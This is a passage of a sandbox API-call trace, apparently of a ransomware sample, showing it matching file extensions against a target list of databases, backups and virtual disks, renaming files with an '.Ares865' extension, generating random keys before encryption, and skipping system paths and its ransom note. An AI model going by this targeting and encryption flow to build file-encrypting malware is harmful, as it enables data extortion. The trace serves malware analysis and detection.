(lpString="mud") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.072] lstrlenW (lpString="mwb") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.072] lstrlenW (lpString="myd") returned 3 [0086.072] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.073] lstrlenW (lpString="ndf") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.073] lstrlenW (lpString="nnt") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.073] lstrlenW (lpString="nrmlib") returned 6 [0086.073] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.073] lstrlenW (lpString="ns2") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.073] lstrlenW (lpString="ns3") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.073] lstrlenW (lpString="ns4") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.073] lstrlenW (lpString="nsf") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.073] lstrlenW (lpString="nv") returned 2 [0086.073] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.073] lstrlenW (lpString="nv2") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.073] lstrlenW (lpString="nwdb") returned 4 [0086.073] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.073] lstrlenW (lpString="nyf") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.073] lstrlenW (lpString="odb") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.073] lstrlenW (lpString="odb") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.073] lstrlenW (lpString="oqy") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.073] lstrlenW (lpString="ora") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.073] lstrlenW (lpString="orx") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.073] lstrlenW (lpString="owc") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.073] lstrlenW (lpString="p96") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.073] lstrlenW (lpString="p97") returned 3 [0086.073] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.074] lstrlenW (lpString="pan") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.074] lstrlenW (lpString="pdb") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.074] lstrlenW (lpString="pdm") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.074] lstrlenW (lpString="pnz") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.074] lstrlenW (lpString="qry") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.074] lstrlenW (lpString="qvd") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.074] lstrlenW (lpString="rbf") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.074] lstrlenW (lpString="rctd") returned 4 [0086.074] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.074] lstrlenW (lpString="rod") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.074] lstrlenW (lpString="rodx") returned 4 [0086.074] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.074] lstrlenW (lpString="rpd") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.074] lstrlenW (lpString="rsd") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.074] lstrlenW (lpString="sas7bdat") returned 8 [0086.074] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.074] lstrlenW (lpString="sbf") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.074] lstrlenW (lpString="scx") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.074] lstrlenW (lpString="sdb") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.074] lstrlenW (lpString="sdc") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.074] lstrlenW (lpString="sdf") returned 3 [0086.074] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.074] lstrlenW (lpString="sis") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.075] lstrlenW (lpString="spq") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.075] lstrlenW (lpString="te") returned 2 [0086.075] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.075] lstrlenW (lpString="teacher") returned 7 [0086.075] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.075] lstrlenW (lpString="tmd") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.075] lstrlenW (lpString="tps") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.075] lstrlenW (lpString="trc") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.075] lstrlenW (lpString="trc") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.075] lstrlenW (lpString="trm") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.075] lstrlenW (lpString="udb") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.075] lstrlenW (lpString="udl") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.075] lstrlenW (lpString="usr") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.075] lstrlenW (lpString="v12") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.075] lstrlenW (lpString="vis") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.075] lstrlenW (lpString="vpd") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.075] lstrlenW (lpString="vvv") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.075] lstrlenW (lpString="wdb") returned 3 [0086.075] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.076] lstrlenW (lpString="wmdb") returned 4 [0086.076] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.076] lstrlenW (lpString="wrk") returned 3 [0086.076] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.076] lstrlenW (lpString="xdb") returned 3 [0086.076] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.076] lstrlenW (lpString="xld") returned 3 [0086.076] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.076] lstrlenW (lpString="xmlff") returned 5 [0086.076] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.Ares865") returned 80 [0086.076] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.077] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2827616) returned 1 [0086.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.078] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2b2860, lpName=0x0) returned 0x15c [0086.080] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xb2860) returned 0xdd0000 [0086.213] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.214] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.214] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.215] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0086.221] CloseHandle (hObject=0x15c) returned 1 [0086.221] CloseHandle (hObject=0x118) returned 1 [0086.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.230] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="..") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="windows") returned -1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="temp") returned -1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="boot") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0086.230] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.230] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0086.230] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0086.230] lstrcpyW (in: lpString1=0x2cce468, lpString2="OMSINTL.DLL.trx_dll" | out: lpString1="OMSINTL.DLL.trx_dll") returned="OMSINTL.DLL.trx_dll" [0086.230] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0086.230] lstrlenW (lpString="Ares865") returned 7 [0086.230] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.230] lstrlenW (lpString=".dll") returned 4 [0086.231] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0086.231] lstrlenW (lpString=".lnk") returned 4 [0086.231] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.231] lstrlenW (lpString=".ini") returned 4 [0086.231] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0086.231] lstrlenW (lpString=".sys") returned 4 [0086.231] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0086.231] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0086.231] lstrlenW (lpString="bak") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.231] lstrlenW (lpString="ba_") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.231] lstrlenW (lpString="dbb") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.231] lstrlenW (lpString="vmdk") returned 4 [0086.231] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.231] lstrlenW (lpString="rar") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.231] lstrlenW (lpString="zip") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.231] lstrlenW (lpString="tgz") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.231] lstrlenW (lpString="vbox") returned 4 [0086.231] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.231] lstrlenW (lpString="vdi") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.231] lstrlenW (lpString="vhd") returned 3 [0086.231] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.231] lstrlenW (lpString="vhdx") returned 4 [0086.231] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.231] lstrlenW (lpString="avhd") returned 4 [0086.231] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.232] lstrlenW (lpString="db") returned 2 [0086.232] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.232] lstrlenW (lpString="db2") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.232] lstrlenW (lpString="db3") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.232] lstrlenW (lpString="dbf") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.232] lstrlenW (lpString="mdf") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.232] lstrlenW (lpString="mdb") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.232] lstrlenW (lpString="sql") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.232] lstrlenW (lpString="sqlite") returned 6 [0086.232] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.232] lstrlenW (lpString="sqlite3") returned 7 [0086.232] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.232] lstrlenW (lpString="sqlitedb") returned 8 [0086.232] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.232] lstrlenW (lpString="xml") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.232] lstrlenW (lpString="$er") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.232] lstrlenW (lpString="4dd") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.232] lstrlenW (lpString="4dl") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.232] lstrlenW (lpString="^^^") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.232] lstrlenW (lpString="abs") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.232] lstrlenW (lpString="abx") returned 3 [0086.232] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.232] lstrlenW (lpString="accdb") returned 5 [0086.232] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.232] lstrlenW (lpString="accdc") returned 5 [0086.232] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.233] lstrlenW (lpString="accde") returned 5 [0086.233] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.233] lstrlenW (lpString="accdr") returned 5 [0086.233] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.233] lstrlenW (lpString="accdt") returned 5 [0086.233] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.233] lstrlenW (lpString="accdw") returned 5 [0086.233] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.233] lstrlenW (lpString="accft") returned 5 [0086.233] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.233] lstrlenW (lpString="adb") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.233] lstrlenW (lpString="adb") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.233] lstrlenW (lpString="ade") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.233] lstrlenW (lpString="adf") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.233] lstrlenW (lpString="adn") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.233] lstrlenW (lpString="adp") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.233] lstrlenW (lpString="alf") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.233] lstrlenW (lpString="ask") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.233] lstrlenW (lpString="btr") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.233] lstrlenW (lpString="cat") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.233] lstrlenW (lpString="cdb") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.233] lstrlenW (lpString="ckp") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.233] lstrlenW (lpString="cma") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.233] lstrlenW (lpString="cpd") returned 3 [0086.233] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.234] lstrlenW (lpString="dacpac") returned 6 [0086.234] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.234] lstrlenW (lpString="dad") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.234] lstrlenW (lpString="dadiagrams") returned 10 [0086.234] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.234] lstrlenW (lpString="daschema") returned 8 [0086.234] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.234] lstrlenW (lpString="db-journal") returned 10 [0086.234] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.234] lstrlenW (lpString="db-shm") returned 6 [0086.234] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.234] lstrlenW (lpString="db-wal") returned 6 [0086.234] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.234] lstrlenW (lpString="dbc") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.234] lstrlenW (lpString="dbs") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.234] lstrlenW (lpString="dbt") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.234] lstrlenW (lpString="dbv") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.234] lstrlenW (lpString="dbx") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.234] lstrlenW (lpString="dcb") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.234] lstrlenW (lpString="dct") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.234] lstrlenW (lpString="dcx") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.234] lstrlenW (lpString="ddl") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.234] lstrlenW (lpString="dlis") returned 4 [0086.234] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.234] lstrlenW (lpString="dp1") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.234] lstrlenW (lpString="dqy") returned 3 [0086.234] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.235] lstrlenW (lpString="dsk") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.235] lstrlenW (lpString="dsn") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.235] lstrlenW (lpString="dtsx") returned 4 [0086.235] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.235] lstrlenW (lpString="dxl") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.235] lstrlenW (lpString="eco") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.235] lstrlenW (lpString="ecx") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.235] lstrlenW (lpString="edb") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.235] lstrlenW (lpString="epim") returned 4 [0086.235] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.235] lstrlenW (lpString="fcd") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.235] lstrlenW (lpString="fdb") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.235] lstrlenW (lpString="fic") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.235] lstrlenW (lpString="flexolibrary") returned 12 [0086.235] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.235] lstrlenW (lpString="fm5") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.235] lstrlenW (lpString="fmp") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.235] lstrlenW (lpString="fmp12") returned 5 [0086.235] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.235] lstrlenW (lpString="fmpsl") returned 5 [0086.235] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.235] lstrlenW (lpString="fol") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.235] lstrlenW (lpString="fp3") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.235] lstrlenW (lpString="fp4") returned 3 [0086.235] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.236] lstrlenW (lpString="fp5") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.236] lstrlenW (lpString="fp7") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.236] lstrlenW (lpString="fpt") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.236] lstrlenW (lpString="frm") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.236] lstrlenW (lpString="gdb") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.236] lstrlenW (lpString="gdb") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.236] lstrlenW (lpString="grdb") returned 4 [0086.236] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.236] lstrlenW (lpString="gwi") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.236] lstrlenW (lpString="hdb") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.236] lstrlenW (lpString="his") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.236] lstrlenW (lpString="ib") returned 2 [0086.236] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.236] lstrlenW (lpString="idb") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.236] lstrlenW (lpString="ihx") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.236] lstrlenW (lpString="itdb") returned 4 [0086.236] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.236] lstrlenW (lpString="itw") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.236] lstrlenW (lpString="jet") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.236] lstrlenW (lpString="jtx") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.236] lstrlenW (lpString="kdb") returned 3 [0086.236] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.236] lstrlenW (lpString="kexi") returned 4 [0086.236] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.237] lstrlenW (lpString="kexic") returned 5 [0086.237] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.237] lstrlenW (lpString="kexis") returned 5 [0086.237] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.237] lstrlenW (lpString="lgc") returned 3 [0086.237] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.237] lstrlenW (lpString="lwx") returned 3 [0086.237] lstrcmpiW (lpString1="dll", 